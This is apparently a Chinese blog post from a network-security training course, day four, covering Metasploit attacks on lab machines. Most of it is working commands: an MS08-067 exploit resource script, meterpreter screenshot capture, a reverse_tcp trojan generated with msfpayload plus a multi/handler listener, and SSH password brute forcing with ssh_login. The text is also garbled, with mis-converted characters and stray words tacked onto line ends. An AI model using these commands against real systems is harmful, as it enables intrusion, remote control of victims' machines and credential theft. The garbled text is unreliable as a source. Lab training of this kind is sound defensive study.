腳本攻擊、後滲透攻擊(網安全實訓第四天)

1.經過腳本快速攻擊shell

2.後滲透攻擊續windows

1.經過腳本快速攻擊api

咱們能夠經過msfconsole -x 「msfconsole內輸入的命令」實現快速攻擊,進一步,咱們能夠將攻擊須要執行的命令寫成腳本,進行攻擊。服務器

(1)編輯腳本session

vi abin.rc

輸入如下內容。(根據實際狀況修改)ssh

use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.183.132
set LHOST 192.168.183.131
exploit

(2)執行腳本tcp

msfconsole -r abin.rc

經過之星腳本文件,直接攻擊成功,獲取shell。工具

補充:若是同時攻擊成功多個主機,能夠經過sessions來管理。線程

background 將當前會話放在後臺
sessions -l 查看已經創建的會話
sessions -i 1 進入會話

 

2.後滲透攻擊續3d

 

(1)截取屏幕

因爲截屏須要在圖形界面才能夠看到,因此咱們先進入圖形界面。

startx
msfconsole -r abin.rc
screenshot (截屏)

截取的對方桌面:

其餘命令能夠經過輸入 ? 查看:

(2)木馬攻擊

    1.生成木馬文件

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.138.129 LPORT=5555 X >abin.exe

    2.木馬服務器配置

    進入msfconsole,使用對應模塊,這裏使用exploit/multi/handler模塊:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST 192.168.183.129 (設置監聽主機,也就是bt5的地址)

set LPORT 5555 (設置監聽端口,也就是上面的5555)

 

exploit (進入監聽模式)

 

當有主機運行咱們開始生成的木馬程序,就能夠得到對方主機shell。

 

3.暴力破解

    (1)使用msf自帶模塊進行暴力破解

進入msfconsole控制檯:

msfconsole

 

使用auxiliary/scanner/ssh/ssh_login模塊:

use auxiliary/scanner/ssh/ssh_login

 

show options

設置目標主機:

set RHOSTS 192.168.183.130

設置用戶名:

set USERNAME msfadmin

也能夠使用:set USER_FILE 從字典讀取用戶名。

設置密碼字典:

set PASS_FILE pass.txt

pass.txt是我本身編寫的一個簡單字典,也能夠根據社會工程學收集的信息,使用工具進行生成。

設置線程:(線程越多,速度越快,固然,須要的電腦配置越高)

set THREADS 10

開始暴力破解:

exploit

咱們能夠看到,已經爆破出ssh登陸密碼。

相關文章
相關標籤/搜索